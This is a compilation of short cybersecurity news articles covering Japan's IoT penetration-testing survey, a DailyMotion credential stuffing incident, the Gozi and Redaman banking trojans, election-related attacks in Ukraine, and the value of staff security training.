Japanese Government to “Pen Test” Citizen’s IoT Devices Ahead of Olympics

The Japanese Ministry of Internal Affairs and Communications revealed in a recent report that 2/3 of cyber attacks in 2016 were aimed at Internet of Things (IoT) devices. This coupled with preparing for the 2020 Olympics, resulted in the Japenese Government passing a law to allow for penetration testing on citizens’ IoT devices.

This will form part of a survey from the National Institute of Information and Communications Technology (NICT). With Japan’s Ministry of Internal Affairs and Communications, the NICT will gather a list of unsecured devices and pass these onto the Internet Service Providers (ISP). Thereafter, authorities and ISPs will let individuals know the weaknesses they will need to remedy such as passwords. The NICT will test over 200 million IoT devices including cameras, appliances and routers.

IoT is a target for hackers

The rise in dependency on machines and the internet has led to the increase of the two being combined. Together it has become the internet of things. Most devices, from kitchen appliances to the refrigerator can now connect to the internet as a smart way to manage appliances. This provides benefits including the ability to maximise the use of data, providing a convenient and efficient service or lifestyle. With this in mind, passwords are the most common authentication procedure on these devices. A weak password will, therefore, allow for easy deployments of IoT and router botnets. These botnets can take over devices to cause disruption to devices’ services.

Testing is crucial

On the lead up to Olympic games, governments have in the past tested the IT infrastructure in attempts to mitigate chances of successful attacks. For example, Rio had carried out around 8000 testings with 400 flaws found in 125 of the tests susceptible to malware attacks. Attackers target the Olympics as it is a global event that catches the attention of many countries. It is also a platform with big opportunities for nation-state attackers to gain publicity and valuable information. It also provides a profitable advantage for cybercrime groups.

The law passed by the Japanese government is crucial following past public events. Instances include the Pyeongchang Winter Olympics in South Korea. The malware, Olympic Destroyer, deployed in 2018 and affected internet and television services. Another instance is where the Ukrainian intelligence service reported Russian hackers attempted to use VPN Filter to disrupt broadcasts of the 2017 UEFA Champions League final. Other Olympic attacks include DDoS attacks on power systems at the 2012 London Olympics. Although successfully mitigating a majority of attacks, the Rio Olympics in 2016 succumbed to DDoS attacks. It eventually became the longest  500Gbps+ attack to date.

The project will start next month. Japan are using other measures to tackle threats posed to the 2020 Games with the use of facial recognition.

Original Source Here

DailyMotion Victim of Credential Stuffing Attack

Popular video sharing platform DailyMotion announced it has become the victim of a credential stuffing attack. According to an email sent to affected customers, the attack started over the weekend beginning January 19.

DailyMotion is one of the most popular video-sharing sites and is ranked number 134 on the Alexa traffic ranking.

What is Credential Stuffing?

A few sites have had problems with these attacks in recent months. Credential stuffing is a security term used to describe hackers gaining access to sites with leaked usernames and passwords. The credentials are usually obtained from other sites and then used to try and gain access to different sites.

According to the email from DailyMotion, the attack was successful in some cases. It confirmed that hackers were able to gain access to a limited number of accounts.

Discovery of the Attack

The video platform said its security team discovered the attack and took steps to block it. From last Saturday, the company has been logging off users it believes were affected and resetting their passwords.

The company sent an email to affected customers, with a link to reset their passwords. They also notified CNIL (Commission nationale de l’informatique et des libertés) The CNIL is France’s data privacy unit, and all companies in France are required to inform them under GDPR legislation.

Other Attacks

Other companies have suffered credential stuffing attacks in recent months. In September, Ad Blocker company AdGuard became a victim. In November, global bank HSBC and restaurant chain Dunkin’ Donuts were also attacked.

Two weeks ago, social platform Reddit announced that it had become a victim. They stated hackers had gained access to some accounts following the attack.

DailyMotion suffered a previous security attack in 2016. On this occasion, a hacker managed to steal 85.2 million unique email addresses and usernames. They also took 18.3 million passwords from users accounts.

Original Source Here


Banking trojan Gozi resurfaces with new tactics

Twelve-year-old trojan malware, Gozi, has resurfaced with new techniques to steal users’ financial credentials. Using common strategies such as keylogging, recording information and extracting saved passwords, hackers use the data to steal identities and user’s funds.

The trojan in the past targeted users who downloaded compromised software or paired with browser hackers to exploit further malware such as adware. Users affected included Business customers, researchers and financial institutions. A single attack of this trojan could compromise over 5200 hosts and 10,000 users. The method to steal the data once it is in the devices remain the same as every other malware.

New tactics

Since a leak of the malware code, (full code found here), malware distributors released many versions. Consequently, Ursnif became the most commonly used code. This could be down to the fact it runs in a different way. Although it releases a spam mail in the traditional way with a document containing malicious macros, the malware does not deploy from the attached document. Instead, the obfuscated code runs a PowerShell command (used to manage administrative tasks) which runs another PowerShell command. It then downloads the malware executable to the users’ AppData directory.  The PowerShell is executed from the use of Windows Management Instrumentation Command-line and the code runs, deploying the malware. This effectively makes the user less suspecting of the email and file and makes it easier for the malware to stay within a users’ device undetected.

Use of endpoint antivirus software can help a user stay protected against most types of malware. Cisco Talos managed to discover Gozi through its own advanced malware protection software. It highlights on its website, the indicators to help stop users being infected.

Original Source Here



Impending Ukraine Election Targeted by Hackers

Ukraine is reporting an increase in cyber attacks aimed at disrupting the upcoming presidential elections. The Ukraine Government believe that Russian-state actors could be behind the disruption.

News Reports

The news agency Reuters reported attacks had intensified. These attacks, aimed at the Ukraine Government and political party, have a clear intent. They are designed to disrupt the presidential elections, scheduled for March.

Suspected Russian Involvement

President Petro Poroshenko declared that Russia will try to interfere with the Ukraine election process. Poroshenko also feels they have developed a strong cyber team to help them.

Speaking to foreign diplomats, Poroshenko stated: “This is not just our take. The Russian meddling to influence Ukraine’s elections is well underway.”

Threats From Actors

Actors are carrying out spear-phishing attacks against election officials. These actors are using stolen details bought on the dark web. Such techniques have been used on Ukranian energy, transport and banking industries in the past.

Speaking to Reuters, Serhiy Demedyuk noticed that attackers were using greeting cards, shopping invitations and software updates, infected with viruses. These viruses were then used to steal passwords and other personal information.

Demedyuk stated: “Ten weeks before the elections, hackers were also buying personal details of election officials.”

The Ukraine authorities have confirmed that no hackers have managed to penetrate the national election infrastructure.

Previous Attack

A previous attack in 2017 called NotPetya, hit thousands of computers in Ukraine. In that attack, alleged Russian-linked hackers compromised the Ukranian tax accounting system called MeDoc.

Experts are concerned that a similar attack could hit critical infrastructure again. This would cause widespread problems across the country.

Russia has denied any involvement in these campaigns. Kremlin spokesperson Dmitry Peskov stated: “Russian state structures have never interfered, and are not interfering, in the internal affairs of other countries.”

Experts are continuing to monitor the situation in Ukraine as the presidential election campaign draws near.

Original Source Here

Why it’s important for organizations to train staff in cybersecurity

Breaches are an ongoing issue that organisations face on a day to day basis. For as long as risk carries a level of uncertainty, preventing it is hard to do. But there is a difference between accepting this fact and doing nothing about it and accepting this fact and using all reasonable efforts to mitigate breaches from taking place. One of the measures observed in practice that organisations are failing to take is in training staff on cybersecurity. Here are just some of the reasons why the efforts of training staff requires more attention.

Social Engineering

Cybersecurity is beyond the IT team as staff play a significant part too. As the drivers of an organisation, hackers commonly use them as vectors. This is especially evident when we look at the cyber kill chain’s first stage. It requires gathering information about the target. Here are where they exploit weak spots to obtain relevant information to carry out intended attacks. Hackers use social engineering as just one of the tactics but it is the most common as they can deploy it easily. They know about the lack of training that exists amongst staff in general and it sometimes just takes targeting one person.

It is important for staff to be aware of social engineering because together they make up more than the Board and IT team. Examples of areas organisations should elude staff to include social media content and being manipulated into allowing unauthorised visitors onto the work site. In addition, phishing emails are still on the rise, advancing each time and show no signs of slowing down anytime soon. Staff need training on avoiding being targets of this.

Human error leading to breaches

Recent articles have referred to significant flaws within organisations. As Kaspersky Lab’s recent article reveals, it still stands as one of the highest causes of breaches yet is dealt with so poorly. Organisations are not learning from other organisations’ failures reported publicly. One being with Gloucestershire Police whose employee accidentally emailed personal data belonging to victims of child abuse to unintended recipients. This is the most crucial reason as to why training is so important. Not only can errors occur from sending emails to the wrong recipients, but also by using compromised removable media, losing mobile devices containing business data and poor security management around these devices.

Other Benefits

Staff training should be part of an organisation’s cyber hygiene to help maintain security. Benefits of implementing training will allow the following:

Staff will know what is vital information to share and with whom

The more knowledge staff have the more they understand and enables staff to adopt it into their everyday operations. Cybersecurity requires a team effort as well as staff individually taking responsibility for their actions when dealing with data. An example is with software and applications. Departments tend to download and use tools that will aid with daily tasks that IT are not aware of. This is known as shadow IT. If the IT team do not know the software exists, it is hard for the team to maintain security within the organisation. If staff are made aware of the need for security and dangers around potential extensions and applications, they will know when to liaise with the IT team and other relevant employees.

Original Source Here

Banking Malware Redaman continues to strike

Redaman banking trojan

A recent spam campaign distributed banking malware, Redaman, targeting customers of Russian financial institutions. The spate of campaigns was first detected in 2015 and has since affected users in Russia, Netherlands, the US, Japan and Sweden. Reports further show that malware distributors used servers based in Russia, Ukraine, Germany and Estonia. Palo Alto Networks noted over 100 cases in the year of 2018 alone. The mail spams targeted email addresses ending in .ru.

How it works

The malware distributor uses the traditional method of dispatching mail spam, with an attached archive format file. The formats can consist of zip files, RAR, OR, GZ and 7Z. Once a user clicks on the extracted EXE file (which usually commands a device to run the file), the Redaman malware deploys and is free to carry out its motives. The document the user clicks on is the usual PDF file. The email contains messages relating to payment owed, documents of money owed and payment verification. By being vague in content, it heightens users curiosity, making them feel that they will understand more after reading it, by then they have clicked on and activated the malware. This message content targets those in financial difficulty or debt.

Behind the scenes, once executed the malware checks for files that are sandboxed or emulated and exits if it finds this to be the case. If not, the malware continues by dropping a DLL file in a users’ temporary directory, AppData\Local\Temp\.

Upon creating a folder for itself, it moves the DLL into it. The malware then uses Windows scheduled task to load it each time the user logs into their device. It aims to stay undetected whilst monitoring the users’ activity. It obtains financial data and uses it for fraudulent activity. To steal credentials, it downloads data directly from the PC or captures screenshots. By monitoring keylogging, it can also pick up hashed data such as passwords.

The Redeman mail spam campaigns characteristics are traditional with a twist. Although sent widely, it targets a group of individuals within Russia and uses different message content. It targets Russia whilst sending within Russia with the objective to steal financial data.  These are all characteristics found in cybercriminals and organised crime groups.

Original Source Here